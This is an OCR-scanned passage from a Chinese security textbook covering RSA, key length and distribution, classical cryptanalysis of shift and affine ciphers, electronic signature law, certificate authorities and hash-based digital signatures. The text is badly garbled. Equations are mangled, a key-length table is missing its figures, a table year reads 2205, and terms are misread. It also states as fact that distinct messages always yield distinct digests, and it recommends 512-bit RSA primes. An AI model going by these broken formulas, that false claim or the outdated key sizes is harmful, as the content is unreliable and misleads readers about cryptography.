在 公 钥 密 码 体制 中 ， 用 公 钥 分 析 密 钥 ， 即 用 加 密 函 数 求解 密 函 数 ， 在 计算 上 是 不 可 行 
的 。 如 果 一 个 函数 本 身 易 于 求 得 但 难以 求 逆 ， 我 们 称 这 样 的 函数 为 单 向 函数 。 在 加 密 过 程 
中 ， 我 们 希望 加 密 函 数 ef 为 一 个 单 向 函数 ， 以 便 可 以 解密 。 例 如 ， 有 如 下 一 个 单 向 函数 : 
假定 为 两 个 大 素数 p 和 g 的 乘积 ，5 为 一 个 整数 ， 那 么 定义 f: Zn 一 Zn 为 fx)=xw mod n。 

如 果 我 们 要 构造 一 个 公 钥 密 码 体制 ， 仅 给 出 一 个 单 向 函数 是 不 够 的 。 从 接收 者 B 的 角 
度 来 看 ， 并 不 需要 ex 是 单 向 的 ， 因 为 他 需要 用 有 效 的 方式 解密 所 收 到 的 信息 。 因 此 ，B 应 
该 拥有 一 个 陷 门 ， 其 中 包含 容易 求 出 ex 的 逆 函 数 的 秘密 信息 。 也 就 是 说 ，B 之 所 以 能 够 有 
效 地 解密 ， 是 因为 他 有 额外 的 秘密 信息 ， 即 k， 能 够 提供 解密 函数 办。 因此 ， 如 果 一 个 函数 
是 单 向 函数 ， 并 在 具有 特定 陷 门 的 信息 后 容易 求 出 其 逆 ， 我 们 就 称 它 为 一 个 陷 门 单 向 函数 。 

考虑 函数 fx)=xw mod n， 它 的 逆 函 数 71 有 类 似 的 形式 :fw)=x” mod n。 这 里 的 陷 门 就 
是 利用 的 因子 分 解 ， 有 效 地 算出 正确 的 指数 a。 

我 们 现在 描述 RSA 密码 体制 。 这 个 密码 体制 利用 Z 的 计算 ， 其 中 是 两 个 不 同 的 奇 
素数 p 和 gq 的 乘积 。 对 于 这 样 一 个 整数 mw， 注意 到 B(m)=(p-1)(q-1)。 这 个 密码 体制 的 正式 
描述 如 下 。 

密码 体制 2.3 ”RS4 密码 体制 

设 n=pq。 其 中 p 和 g 为 素数 。 定 义 : 

K={(n.p,q,a,b):ab==1 (mod Dn))} 

对 于 本 (np,q,q,b)， 定 义 : 

el)=w modn 和 diW=y modn 
值 n 和 4b 组 成 了 公 钥 ,日 值 ps、g 和 a 组 成 了 私 钥 。 

下 面 给 出 一 个 描述 RSA 密码 体制 的 例子 。 

例 2.1 假定 B 选择 了 p=101 和 g=113。 那 么 n=pg=101x113=11413, @B(n)= (p-1)(q-1)= 
100x112=11200。 假 设 Bob 选择 了 b=3533， 则 : a= pl(mod 11200) =6597， 因 此 B 的 解密 
指数 为 a=6597。 

B 在 一 个 目录 中 发 布 n=11413 和 b=3533。 现 假定 A 想 加 密 明 文 9726 并 发 送 给 B，A 
计算 : 97263533(mod 11413)=5761。 

然后 把 密 文 5761 通过 信道 发 出 。 当 B 收 到 密 文 5761, 用 其 秘密 解密 密 钥 ( 私 钥 )a=6597 
进行 解密 : 57615” (mod 11413)=9726。 

RSA 密码 体制 的 安全 性 是 基于 相信 加 密 函 数 exx)=x* mod n 是 一 个 单 向 函数 ， 所 以 对 
于 一 个 敌手 来 说 ,试图 解密 密 文 在 计算 上 将 是 不 可 行 的 .允许 B 解 密 密 文 的 陷 门 是 分 解 n=pg 
的 信息 ， 这 是 数学 上 的 一 个 难题 。 由 于 B 知道 这 个 分 解 ， 他 可 以 计算 Bm)= -1)(g-1)， 然 
后 计算 解密 指数 a。 实 际 上 ， 例 2.1 并 不 是 一 个 安全 的 例子 ， 因 为 此 例 中 密 钥 的 长 度 太 短 。 
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就 目前 而 言 ， 一 般 推荐 取 p、g 均 为 512 位 的 素数 ， 那 么 就 是 1024 位 的 合 数 。 

RSA 算法 是 公 钥 系统 的 最 具有 典型 意义 的 算法 ， 用 于 大 多 数 使 用 公 钥 密码 进行 加 密 和 
数字 签名 的 产品 和 标准 。RSA 算法 的 软件 实现 速度 比较 慢 ， 一 般 比 对 称 密码 算法 慢 100 多 
倍 。 所 以 通常 使 用 硬件 实现 RSA 算法 。 在 实际 中 ， 有 时 也 将 对 称 密码 和 公 钥 密码 结合 起 来 
使 用 。 


2.1.5 ” 密 钥 管理 


密 钥 是 加 密 算法 中 的 可 变 部 分 。 加 密 系统 的 安全 性 取决 于 对 密 钥 的 保护 ， 而 不 是 对 算 
法 或 硬件 本 身 的 保护 。 密 码 体制 可 以 公开 ， 但 是 密 钥 绝对 不 可 以 被 破坏 、 丢 失 或 泄漏 ， 否 
则 安全 将 不 复 存在 。 因 此 ， 密 钥 管理 对 于 保证 数据 系统 的 安全 是 极为 重要 的 。 

密 钥 管理 是 指 对 所 用 密 钥 生命 周期 的 全 过 程 (产生 、 存 储 、 分 配 、 使 用 、 废 除 、 归 档 、 
销毁 ) 实 施 的 安全 保密 管理 。 密 钥 管理 本 身 是 一 个 很 复杂 的 课题 ， 而 且 是 保证 安全 性 的 关键 
点 ， 其 中 密 钥 的 产生 和 分 配 是 最 重要 的 。 密 钥 管理 方法 因 所 使 用 的 密码 体制 (对 称 密码 体制 
和 公 钥 密码 体制 ) 不 同 而 不 同 。 

1. 密 钥 的 生成 

在 密 钥 的 生成 过 程 中 ， 确 定 密 钥 的 长 度 是 非常 重要 的 。 究 竟 多 长 的 密 钥 是 适合 的 呢 ? 
我 们 的 原则 : 既 保证 系统 的 安全 性 ， 又 不 至 于 开销 太 高 。 那 么 多 长 的 密 钥 能 够 保证 系统 的 
安全 性 呢 ? 这 要 对 对 称 密 码 和 公 钥 密码 分 别 进行 分 析 。 对 于 对 称 密码 而 言 ， 假 设 算法 的 保 
密 强 度 是 足够 的 ， 除 了 穷 举 攻击 外 ， 没 有 更 好 的 攻击 方法 。 如 果 密 钥 长 为 n 位 ， 则 有 22” 种 
可 能 的 密 钥 ， 因 此 需要 2 次 计算 。 表 2-7 列 出 对 相应 位 数 的 密 钥 用 穷 举 攻击 方法 试验 的 次 
数 和 所 需 的 时 间 。 


表 2-7 ”对称 密 码 的 穷 举 攻击 


密 钥 位 数 时 间 / 年 
56 
64 
128 
2048 


对 于 对 称 密码 ， 根 据 信息 的 类 型 不 同 ， 所 需要 的 密 钥 长 度 也 各 不 相同 ， 如 表 2-8 所 示 。 
而 公 钥 密码 的 密 钥 长 度 如 表 2-9 所 示 。 
表 2-8 对称 密码 的 密 钥 长 度 


信息 类 型 保密 时 间 最 短 密 钥 长 度 /位 


战备 军事 信息 数 分 钟 或 数 小 时 56 一 64 


企业 赢利 信息 几 天 或 几 周 64 


由 EREEFEEEY32 


续 表 
六 息 类 型 最 短 密 钥 长 度 /位 
长 期 赢利 信息 几 年 64 
商业 秘密 几 十 年 112 
外 交 秘 密 65 年 以 上 至 少 128 
美国 统计 数据 100 年 至 少 128 
表 2-9 公 钥 密码 的 密 钥 长 度 
位 
年 度 对 于 公司 对 于 政府 
1995 1280 1536 
2000 1280 1536 
2205 1536 2048 
2010 1536 2048 
2015 2048 2048 
知道 了 密 钥 的 长 度 ， 如 何 生成 密 钥 呢 ? 可 以 用 手工 方式 ， 也 可 以 用 自动 化 生成 器 产生 
密 钥 , 所 产生 的 密 钥 要 经 过 质量 检验 。 自 动 化 生成 器 产生 密 钥 不 仅 可 以 减少 人 的 繁琐 劳动 ， 


而 且 还 可 以 消除 人 为 差错 和 有 意 泄漏 ， 因 而 更 加 安全 。 

2. 密 钥 的 分 配 

密 钥 分 配 的 基本 方法 有 3 种 ， 下 面 分 别 介绍 。 

1) “利用 安全 信道 实现 

传统 的 方法 是 通过 邮递 或 信使 护送 密 钥 。 这 种 方法 的 安全 性 取决 于 信使 的 忠诚 ， 成 本 
很 高 。 为 了 减少 费用 可 采用 分 层 方式 ， 信 使 只 传送 高 级 密 钥 ， 而 不 去 传送 大 量 的 数据 加 密 
密 钥 ， 这 样 既 减少 了 信使 的 工作 量 ， 又 克服 了 用 一 个 密 钥 加 密 过 多 数据 的 问题 。 

也 可 采用 某 种 隐蔽 方法 ， 如 将 密 钥 拆 分 成 几 部 分 分 别 递送 ， 如 图 2-7 所 示 。 一 般 情况 
下 此 法 有 效 ， 除 非 敌 手 可 以 截获 密 钥 的 所 有 部 分 。 


2-7 ” 密 钥 的 拆 分 递送 
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2) ”通过 可 信赖 密 钥 管理 中 心 进行 密 钥 分 配 

如 X.509。 相 关内 容 参 见 2.2 节 。 

3) ”利用 物理 现象 实现 

基于 量子 密码 的 密 钥 分 配方 法 是 利用 物理 现象 实现 的 。 


2.1.6 ”密码 分 析 


密码 学 包含 两 个 分 支 一 一 密码 编码 学 和 密码 分 析 学 。 密 码 编码 学 (Cryptography) 是 对 信 
息 进 行 编码 实现 隐蔽 信息 的 一 门 学 问 ， 密 码 分 析 学 (Cryptanalysis) 是 研究 分 析 破 译 密码 的 学 
问 。 密 码 编码 和 密码 分 析 是 相辅相成 的 ， 因 为 只 有 进行 编码 后 才 会 有 密码 的 分 析 ， 并 且 密 
码 分 析 会 促进 密码 编码 的 发 展 ， 密 码 编码 和 密码 分 析 又 是 互 逆 的 ， 两 者 追求 的 目标 截然 相 
反 ， 并 且 两 者 解决 问题 的 途径 有 很 大 差别 ， 密 码 编码 是 利用 数学 来 构造 密码 ， 密 码 分 析 除 
了 依靠 数学 、 工 程 背 景 、 语 言 学 等 知识 外 ， 还 要 靠 经 验 、 统 计 、 测 试 、 眼 力 、 直 觉 判断 能 
力 ……， 有 时 还 靠 点 运气 。 

1. 攻击 类 型 


根据 攻击 者 拥有 的 资源 不 同 ， 可 以 将 攻击 类 型 分 为 唯 密 文 攻击 、 已 知 明文 攻击 、 选 择 
明文 攻击 和 选择 密 文 攻击 ， 如 表 2-10 所 示 。 


表 2-10 攻击 的 类 型 
攻 市 类 到 攻击 者 拥有 的 资源 
加 密 算法 
唯 密 文 攻击 截获 的 部 分 密 广 
加 密 算法 
已 知 明文 攻击 截获 的 部 分 密 文 和 相应 的 明文 
- 加 密 算法 
选择 明文 攻击 加 密 黑 盒子 ， 可 加 密 任意 明文 得 到 相应 的 密 文 
加 密 算法 
选择 密 文 攻击 解密 黑 盒子 ， 可 解密 任意 密 文 得 到 相应 的 明文 
2. 密码 分 析 的 方法 
1) ” 穷 举 破译 法 


对 截 收 的 密 报 依次 用 各 种 可 解 的 密 钥 试 译 , 直到 得 到 有 意义 的 明文 ; 或 在 不 变 密 钥 下 
对 所 有 可 能 的 明文 加 密 直 到 得 到 与 截获 密 报 一 致 为 止 。 此 法 又 称 为 完全 试 凑 法 (Complete 
trial-and-error Method)。 

例 2.2 移 位 密码 分 析 

密 文 : QJENJPXXMCRVN 

方法 : 依次 尝试 所 有 可 能 的 密 钥 0,1,2,…,25， 当 尝试 到 密 钥 9 时 ， 得 到 明文 。 

明文 : haveagoodtime 

只 要 有 足够 的 计算 时 间 和 存储 容量 ， 原 则 上 穷 举 法 总 是 可 以 成 功 的 。 但 实际 中 ， 任 何 
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-种 能 保障 安全 要 求 的 实用 密码 都 会 设计 得 使 这 一 方法 不 可 行 。 

2) 分 析 法 

包括 确定 性 分 析 法 和 统计 分 析 法 。 

确定 性 分 析 法 是 利用 一 个 或 几 个 已 知 量 ( 比 如 ， 已 知 密 文 或 明文 - 密 文 对 ) 用 数学 关系 式 
表示 出 所 求 未 知 量 (如 密 钥 等 )。 已 知 量 和 未 知 量 的 关系 视 加 密 和 解密 算法 而 定 ， 寻 求 这 种 
关系 是 确定 性 分 析 法 的 关键 步骤 。 

统计 分 析 法 是 利用 明文 的 已 知 统计 规律 进行 破译 的 方法 。 密 码 破 译 者 对 截获 的 密 文 进 
行 统计 分 析 ， 总 结 出 其 间 的 统计 规律 ， 并 与 明文 的 统计 规律 进行 对 照 比 较 ， 从 中 提取 出 明 
文 和 密 文 之 间 的 对 应 或 变换 信息 。 许 多 密码 分 析 方法 都 是 利用 英文 字母 的 统计 特性 ， 如 
图 2-8 所 示 。 
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ABCDEFGHEIJIKLMNOPORSTUVWXYZ 


图 2-8 英文 字母 的 统计 
密码 体制 2.4” 仿 射 密码 体制 
字母 表 中 的 字母 被 赋予 一 个 数字 ， 如 a=0, b=1,…, ==25。 密 钥 为 0 一 25 的 数字 对 (a,b)， 
则 加 密 函 数 为 : 
ex(¥)=(ax+b) (mod 26) 
解密 函数 为 : 
di(y)=a! (yb) (mod 26) 
其 中 ，gcd(a,26)=1。 
例 2.3 假设 从 仿 射 密码 获得 的 密 文 为 : FMXVEDKAPHFERBNDKRXRSREFMOR- 
UDSDKDVSHVUFEDKAPRKDLYEVLRHHRH 仅 有 57 个 密 文字 母 ,但 足够 分 析 仿 射 密码 。 
最 高 频 的 密 文字 母 是 : R(8 次 )，D(6 次 )，E、H、K( 各 5 次 )、F，S、V( 各 4 次 )。 开 始 ， 
我 们 可 以 假定 RR 是 e 的 加 密 且 D 是 t 的 加 密 ， 因 为 e 和 t 分 别 是 两 个 最 常见 的 字母 。 数 值 
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化 后 , 我们 有 ex(4)=17，ex(19)=3。 回 忆 加 密 函 数 eA(x)=(ax+5) (mod 26)。 所 以 得 到 两 个 含有 
两 个 未 知 量 的 线性 方程 组 : 
4atb=17 mod 26 
19a+b=3 mod 26 
这 个 方程 组 有 唯一 的 解 a=6，b=19。 但 这 是 一 个 非法 的 密 钥 ， 因 为 gcd(a,26)=2>1。 所 
以 我 们 的 假设 有 误 。 
我 们 下 一 个 猜想 假设 RR 是 e 的 加 密 ，E 是 t 的 加 密 ， 得 o=13， 又 是 不 可 能 的 。 继 续 假 
定 RR 是 e 的 加 密 且 K 是 t 的 加 密 ， 这 得 到 了 a=3， b=5， 是 一 个 合法 的 密 钥 。 剩 下 的 事 是 计 
算 相应 于 大 (3.5) 的 解密 函数 ， 然 后 解密 密 文 看 是 否 得 到 了 有 意义 的 英文 串 。 容 易 证 明 这 是 
-个 有 效 的 密 钥 。 最 后 的 密 文 是 : 


algorithms are quite general definitions of arithmetic processes 
2.2 ”数字 签名 与 数字 证 书 


当 我 们 进入 电子 世界 中 ， 我 们 在 不 能 看 到 对 方 ， 或 是 听 到 对 方 ， 或 是 收 到 对 方 签名 的 
情况 下 怎么 辨别 和 信任 对 方 呢 ? 怎么 保证 我 们 的 交易 是 秘密 进行 的 呢 ? 怎么 知道 我 们 指定 
的 人 得 到 的 消息 是 未 经 算 改 的 呢 ? 数字 签名 与 数字 证 书 给 我 们 提供 了 一 个 真正 安全 的 电子 
世界 。 


2.2.1 电子 签名 


自 人 类 文明 兴起 以 来 ， 人 们 进行 信息 传递 的 方式 ， 首 先是 口头 表达 ， 继 而 发 展 成 书面 
形式 ， 即 当事人 以 书面 文本 作为 意思 表示 。 为 了 确认 当事人 的 身份 ， 产 生 了 手写 署名 和 印 
章 ， 统 称 签名 (为 了 区 别 于 后 面 讲 到 的 电子 签名 概念 ， 将 其 称 为 传统 签名 )。 在 传统 法 律 环 
境 下 ， 这 种 签名 已 成 为 大 多 数 社会 活动 的 法 定 要 件 。 

随 着 科学 技术 的 发 展 ， 电 子 网 络 应 运 而 生 ， 人 们 传递 信息 的 方式 也 发 展 成 了 电子 形式 。 
与 之 相 适应 ， 为 了 解决 网 络 环境 下 交易 当事人 的 身份 确认 问题 ， 人 们 从 技术 上 发 展 出 了 多 
种 手段 ， 如 计算 机 口令 、 数 字 签名 、 生 物 技术 (指纹 、 掌 纹 、 视 网 膜 纹 、 脑 电波 、 声 波 、DNA 
先 ) 签 名 等 。 上 述 这 些 手 段 ， 我 们 统称 为 电子 签名 。 

1. 电子 签名 的 概念 

联合 国 发 布 的 《电子 签名 示范 法 》 中 对 电子 签名 作 如 下 定义 : “ 指 在 数据 电文 中 以 电 
子 形式 所 含 、 所 附 或 在 逻辑 上 与 数据 电文 有 联系 的 数据 ， 它 可 用 于 鉴别 与 数据 电文 相关 的 
签名 人 和 表明 签名 人 认可 数据 电文 所 含 信息 。” 因 此 ， 能 够 在 电子 文件 中 识别 双方 交易 人 
的 真实 身份 ， 保 证 交易 的 安全 性 和 真实 性 以 及 不 可 抵赖 性 ， 起 到 与 手写 签名 或 者 盖 章 同等 
作用 的 电子 技术 手段 ， 即 可 称 为 电子 签名 。 

2. 电子 答 名 立法 

美国 总 统 克 林 屈 于 2000 年 6 月 30 日 正式 签署 的 《电子 签名 法 案 》 是 网 络 时 代 的 重大 
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立法 ， 它 使 电子 签名 和 传统 方式 的 亲笔 签名 具有 同等 法 律 效 力 ， 被 看 作 是 美国 迈 向 电子 商 
务 时 代 的 一 个 重要 标志 。 

克林顿 当天 在 费城 的 国会 大 厅 举 行 的 简短 的 法 案 签字 仪式 上 先 按 传统 方式 签署 了 自己 
的 名 字 ， 之 后 ， 便 率先 使 用 了 电子 签名 的 方式 。 克 林 顿 将 一 张 写 有 其 姓名 编码 的 电子 卡片 
插入 计算 机 中 ， 然 后 输入 密码 :他 爱 犬 的 名 字 “Buddy”。 计 算 机 屏幕 很 快 就 显示 出 一 行 
字 : “电子 签名 全 球 和 全 国 商 务 法 案 现 已 成 为 法 律 ”。 克 林 顿 随即 向 在 场 的 观众 宣布 电子 
签名 已 经 成 功 。 

如 果 有 人 想 通 过 网 络 把 一 份 重要 文件 发 送 给 外 地 的 人 ， 收 件 人 和 发 件 人 都 需要 向 美国 
政府 指定 的 一 个 许可 证 授权 机 构 (CA) 申 请 一 份 电子 许可 证 。 这 份 加 密 的 证 书包 括 了 申请 者 
在 网 上 的 公共 钥匙 即 “ 公 共计 算 机 密码 ”， 用 于 文件 验证 。 在 收 到 加 密 的 电子 文件 后 ， 收 
件 人 使 用 CA 发 布 的 公共 钥匙 把 文件 解密 并 阅读 。 

2000 一 2001 年 , 爱尔兰 、 德 国 、 日 本 、 波兰 等 国政 府 也 先后 通过 各 自 的 电子 签名 法 案 。 

2005 年 4 月 1 日 我 国 《电子 签名 法 》 正 式 施行 。 该 部 法 律 规定 ,消费 者 可 用 手写 签名 、 
公章 的 “电子 版 ”、 秘 密 代号 、 密 码 或 指纹 、 声 音 、 视 网 膜 结 构 等 安全 地 在 网 上 付 钱 、 交 
易 及 转帐 。《 电 子 签名 法 》 的 通过 ， 标 志 着 中 国 首 部 “真正 意义 上 的 信息 化 法 律 ” 正 式 
诞生 。 

3. 电子 签名 模式 

电子 签名 目前 主要 有 三 种 模式 : 智慧 卡 式 、 密 码 式 和 生物 测定 式 。 许 多 公司 的 计算 机 
程序 在 实际 运用 中 大 都 是 将 两 种 或 三 种 模式 结合 在 一 起 ， 这 样 可 以 大 大 提高 电子 签名 的 安 
全 可 靠 性 。 

(1) 智慧 卡 式 。 使 用 者 拥有 一 个 像 信 用 卡 一 样 的 磁卡 ， 内 储 有 关 自 己 的 数字 信息 ， 使 
用 时 只 要 在 计算 机 扫描 器 上 一 扫 ， 然 后 输入 自己 设 定 的 密码 即 成 。 上 述 克 林 顿 “表演 ”用 
的 就 是 这 一 种 。 

(2) 密码 式 。 就 是 使 用 者 设 定 一 个 密码 ， 由 数字 或 字符 组 合 而 成 。 有 的 公司 提供 硬件 ， 
让 使 用 者 利用 电子 笔 在 电子 板 上 签名 后 存 入 电脑 。 电 子 板 不 仅 记录 下 了 签名 的 形状 ， 而 且 
对 使 用 者 签名 时 用 的 力度 、 写 字 的 速度 都 有 记载 。 如 有 人 想 盗用 签名 ， 肯 定 会 露出 马 脚 。 

(3) 生物 测定 式 。 就 是 以 使 用 者 的 身体 特征 为 基础 ， 通 过 某 种 设备 对 使 用 者 的 指纹 、 
面部 、 视 网 膜 或 眼球 进行 数字 识别 ， 从 而 确定 对 象 是 否 与 原 使 用 者 相同 。 

4. 电子 签名 的 技术 实现 

电子 签名 技术 的 实现 需要 使 用 公开 密 钥 算法 (RSA 算法 ) 和 报 文摘 要 (Hash 算法 )。 

公 钥 加 密 在 前 面 作 过 介绍 ， 它 是 指 用 户 有 两 个 密 钥 ， 一 个 是 公 钥 ， 一 个 是 私 钥 ， 公 铀 
是 公开 的 ， 任 何人 都 可 以 使 用 ， 私 钥 是 保密 的 ， 只 有 用 户 自 己 才 可 以 使 用 。 该 用 户 可 以 用 
私 钥 加 密 信息 ， 并 传送 给 对 方 ， 对 方 可 以 用 该 用 户 的 公 钥 将 密 文 解 开 ， 对 方 应 答 时 可 以 用 
该 用 户 的 公 钥 加 密 ， 该 用 户 收 到 应 答 后 可 以 用 自己 的 私 钥 解密 。 公 私 钥 是 互相 解密 的 ， 而 
且 绝对 不 会 有 第 三 者 插 进 来 。 

报 文摘 要 利用 Hash 算法 对 要 传输 的 信息 进行 运算 , 生成 128 位 的 报 文摘 要 , 并 且 不 同 
内 容 的 信息 一 定 会 生成 不 同 的 报 文摘 要 ， 因 此 报 文摘 要 就 成 了 电子 信息 的 “指纹 ”。 
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实现 电子 签名 的 技术 手段 有 很 多 种 ， 但 目前 比较 成 熟 并 在 其 他 先进 国家 和 我 国 普遍 使 
用 的 电子 签名 技术 ， 还 是 基于 PKI 的 公 钥 加 密 技术 。 


2.2.2 ”认证 机 构 (CA) 


CA(Certification Authority) 是 认证 机 构 的 国际 通称 ， 是 PKI 的 主要 组 成 部 分 ， 它 是 对 数 
字 证 书 的 申请 者 发 放 、 管 理 、 取 消 数字 证 书 的 机 构 ， 是 PKI 应 用 中 权威 的 、 可 信任 的 、 公 
开 的 第 三 方 机 构 。CA 认证 是 顺应 电子 商务 和 电子 政务 的 发 展 而 产生 的 。 随 着 网 上 银行 的 普 
遍 应 用 和 在 线 支 付 手 段 的 不 断 完善 ， 网 上 交易 也 变 得 越 来 越 大 众 化 ， 安 全 问题 就 显得 日 益 
重要 ， 而 网 络 间 的 身份 认证 问题 则 是 安全 问题 的 根本 。 认 证 机 构 相 当 于 一 个 权威 可 信 的 中 
间 人 ， 它 的 职责 是 核实 交易 各 方 的 身份 ， 负 责 电子 证 书 的 发 放 和 管理 。 

CA 认证 系统 采用 国际 领先 的 PKI 技术， 总 体 为 三 层 CA 结构 : 第 一 层 为 根 CA; 第 二 
层 为 政策 CA， 可 向 不 同行 业 、 领 域 扩展 信用 范围 ， 第 三 层 为 运营 CA， 根据 证 书 运 作 规范 
(CPS) 发 放 证 书 。CA 的 结构 如 图 2-9 所 示 。 


根 Root CA 


2-9 CA 的 结构 图 


CA 认证 系统 是 PKI 的 信任 基础 ， 因 为 它 管理 公 钥 的 整个 生命 周期 。CA 的 作用 如 下 。 
(1) 发 放 证 书 ， 用 数字 签名 绑 定 用 户 或 系统 的 识别 号 和 公 钥 。 

(2) 规定 证 书 的 有 效 期 。 

(3) 通过 发 布 证 书 废除 列表 (CRL)， 确 保 必 要 时 可 以 废除 证 书 。 


2.2.3 ”数字 签名 


数字 签名 是 电子 签名 的 一 种 ， 即 是 指 采用 非 对 称 密 钥 加 密 技术 实现 的 电子 签名 。 数 字 
签名 技术 已 经 比较 成 熟 ， 目 前 在 国内 外 电子 签名 中 广泛 使 用 。 

1. 什么 是 数字 签名 

数字 签名 是 对 数据 文件 以 密码 学 的 方法 产生 的 一 组 数据 信息 ， 这 组 数据 信息 能 代表 签 
名 者 身份 ， 同 时 也 能 够 确保 数据 文件 在 签名 之 后 不 被 更 改 。 

ISO 对 数字 签名 的 定义 是 : 附加 在 数据 单元 上 的 一 些 数据 ， 或 是 对 数据 单元 所 做 的 密 
码 变换 ， 这 种 数据 或 变换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 的 来 源 和 数据 单元 的 完 
整 性 ， 并 保护 数据 ， 防 止 被 他 人 (如 接收 者 ) 伪 造 。 
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2. 数字 签名 的 特征 


数字 签名 与 手写 签名 的 主要 差别 体现 在 以 下 几 个 方面 。 

(1) 与 所 签 文件 的 关系 不 同 。 一 个 手写 的 签名 是 所 签 文件 的 物理 部 分 ， 而 一 个 数字 签 
名 并 不 是 所 签 文件 的 物理 部 分 ， 所 以 所 使 用 的 数字 签名 算法 必须 把 签名 “ 绑 ” 到 所 签 文 
件 上 。 

(2) 验证 方法 不 同 。 一 个 手写 签名 是 通过 和 原 手写 签名 相 比较 来 验证 的 ， 而 数字 签名 
能 通过 一 个 公开 的 验证 算法 来 验证 。 这 样 ， 任 何人 都 可 以 对 一 个 数字 签名 加 以 验证 。 

(3) 防 复制 能 力 的 差别 。 数 字 签 名 文件 的 “副本 ”与 原 签名 文件 相同 ， 而 伪造 的 手写 
签名 文件 与 原来 的 签名 文件 能 被 区 别 开 来 。 这 一 特征 意味 着 我 们 必须 采取 措施 防止 数字 签 
名 消息 被 重复 使 用 。 例 如 ， 如 果 Alice 使 用 数字 签名 签署 一 则 消息 来 授权 Bob 从 她 的 银行 
帐户 上 取 100 美元 ( 即 支票 )， 她 仅仅 让 Bob 取 一 次 。 因 此 ， 签 名 文件 本 身 应 该 包含 诸如 日 
期 在 内 的 信息 以 防止 该 签名 被 重复 使 用 。 

-个 安全 有 效 的 数字 签名 方案 通常 具有 以 下 的 特点 。 

(1) 可 信 性 : 文件 的 接收 者 相信 签名 者 在 文件 上 的 数字 签名 ， 相 信 签 名 者 认可 文件 的 
内 容 。 

(2) 不 可 伪造 性 : 除 签名 者 本 人 以 外 的 任何 其 他 人 不 能 伪造 签名 者 的 数字 签名 。 

(3) 不 可 重用 性 : 签名 是 被 签 文件 不 可 分 割 的 一 部 分 ， 该 签名 不 能 被 转移 到 别 的 文 
件 上 。 

(4) 不 可 更 改 性 : 一 个 文件 被 签 过 名 后 不 能 更 改 。 若 文件 更 改 ， 其 签名 也 会 发 生变 化 ， 
使 得 原先 的 签名 不 能 通过 验证 从 而 使 文件 无 效 。 

(5) 不 可 抵赖 性 : 签名 者 在 事后 不 能 否认 其 对 某 个 文件 的 签名 。 

这 些 特征 使 数字 签名 不 仅 具 有 手写 签名 的 作用 ， 而 且 还 具有 很 多 手写 签名 不 具备 的 优 
点 ， 如 使 用 方便 、 节 省 时 间 、 节 省 费用 开支 等 ， 正 是 由 于 数字 签名 具备 这 些 特征 ， 才 得 以 
被 人 们 重视 和 广泛 推广 。 

3. 消息 摘要 一 一 一 个 与 数字 签名 密切 相关 的 概念 

目前 数字 签名 主要 集中 在 基于 公 钥 密码 体制 的 数字 签名 技术 的 研究 。 由 于 在 使 用 中 
公 钥 密码 加 密 体 系 的 速度 非常 慢 ， 因 而 对 整个 消息 文本 直接 用 公 钥 密码 算法 进行 签名 在 实 
际 的 使 用 中 是 不 可 行 的 。 为 了 解决 这 一 问题 ， 可 以 对 大 段 的 、 待 签名 的 消息 进行 预 处 理 ， 
从 中 提炼 出 一 个 固定 大 小 、 能 够 唯一 代表 这 段 消息 的 特征 值 ， 这 个 特征 值 就 是 消息 摘要 。 

消息 摘要 算法 ， 又 称 HASH 函数 或 杂凑 函数 ， 是 在 信息 安全 领域 中 有 着 广泛 和 重要 应 
用 的 密码 算法 ， 且 有 一 种 类 似 于 指纹 的 应 用 。 在 网 络 安全 协议 中 ， 杂 凑 函 数 用 来 处 理 电子 
签名 ， 将 宛 长 的 签名 文件 压缩 为 一 段 独 特 的 数字 信息 ， 像 指纹 鉴别 身份 一 样 保 证 原来 数字 
签名 文件 的 合法 性 和 安全 性 。 

一 个 好 的 消息 摘要 算法 具有 下 列 几 种 性 质 。 

(1) 消息 中 的 任何 一 点 微小 变化 ， 将 导致 摘要 的 大 面积 变化 即 雪崩 效应 。 

(2) 试图 从 摘要 中 恢复 消息 是 不 可 能 的 。 

(3) 找到 两 条 具有 相同 摘要 值 的 消息 在 计算 上 是 不 可 行 的 。 目 前 比较 流行 的 Hash 算法 
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有 MD4、MD5、SHA-1 算法 等 。 

值得 一 提 的 是 ， 在 2004 年 8 月 17 日 的 美国 加 州 圣 巴巴 拉 ， 召 开 的 国际 密码 学 会 议 
(Crypto*2004) 安 排 了 三 场 关于 杂凑 函数 的 特别 报告 。 在 国际 著名 密码 学 家 Eli Biham 和 
Antoine Joux 相继 做 了 对 SHA-1 的 分 析 与 给 出 SHA-0 的 一 个 碰撞 之 后 , 来 自 山东 大 学 的 王 
小 云 教授 做 了 关于 破译 MD5、HAVAL-128、MD4 和 RIPEMD 算法 的 报告 。 在 会 场 上 ， 当 
她 公布 了 MD 系列 算法 的 破解 结果 之 后 ， 报 告 被 激动 的 掌声 打 断 。 王 小 云 教授 的 报告 万 动 


掌 致敬 ， 这 在 密码 学 会 议 上 是 少见 的 盛况 。 王 小 云 教授 的 报告 缘何 引起 如 此 大 的 反响 ? 因 
为 她 的 研究 成 果 作为 密码 学 领域 的 重大 发 现 宣告 了 固 若 金汤 的 世界 通行 密码 标准 MD5 的 
堡垒 龙 然 倒塌 ， 引 发 了 密码 学 界 的 轩然大波 。 会 议 总 结 报告 这 样 写 道 : “我 们 该 怎么 办 ? 
MD5 被 重创 了 ; 它 即 将 从 应 用 中 淘汰 。SHA-1 仍然 活着 ， 但 也 见 到 了 它 的 末日 。 现 在 就 得 
开始 更 换 SHA-1 了 。” 


4. 数字 签名 方案 


-个 数字 签名 方案 包括 两 个 部 分 : 签名 算法 和 验证 算法 。Alice 能 够 使 用 一 个 私有 的 签 

名 算法 sig 来 为 消息 x 签名 ， 签 名 结果 sig(x) 能 使 用 一 个 公开 的 验证 算法 ver 进行 验证 。 给 
定数 据 对 (x,y)， 验 证 算法 根据 签名 是 否 有 效 而 返回 该 签名 为 真 或 为 假 的 答案 。 我 们 将 RSA 
密码 体制 用 于 数字 签名 中 ， 此 时 ， 我 们 将 它 称 为 RSA 签名 方案 ， 见 密码 体制 2.5。 

密码 体制 2.5 RSA 签名 方案 

设 n=pg。 其 中 p 和 g 为 素数 。 定 义 : 

K={(n.p,q,a,b):ab==1 (mod Dn))} 
值 n 和 4b 组 成 了 公 钥 ， 且 值 p、g 和 a 组 成 了 私 钥 。 对 于 三 (np,q,a,b)， 定 义 : 
sigA(x)=x" mod n 


Vertxy)= true > = mod n 

因此 ，Alice 使 用 RSA 解密 规则 dt 为 消息 x 签名 。 因 为 d=sigx 是 保密 的 ， 所 以 Alice 
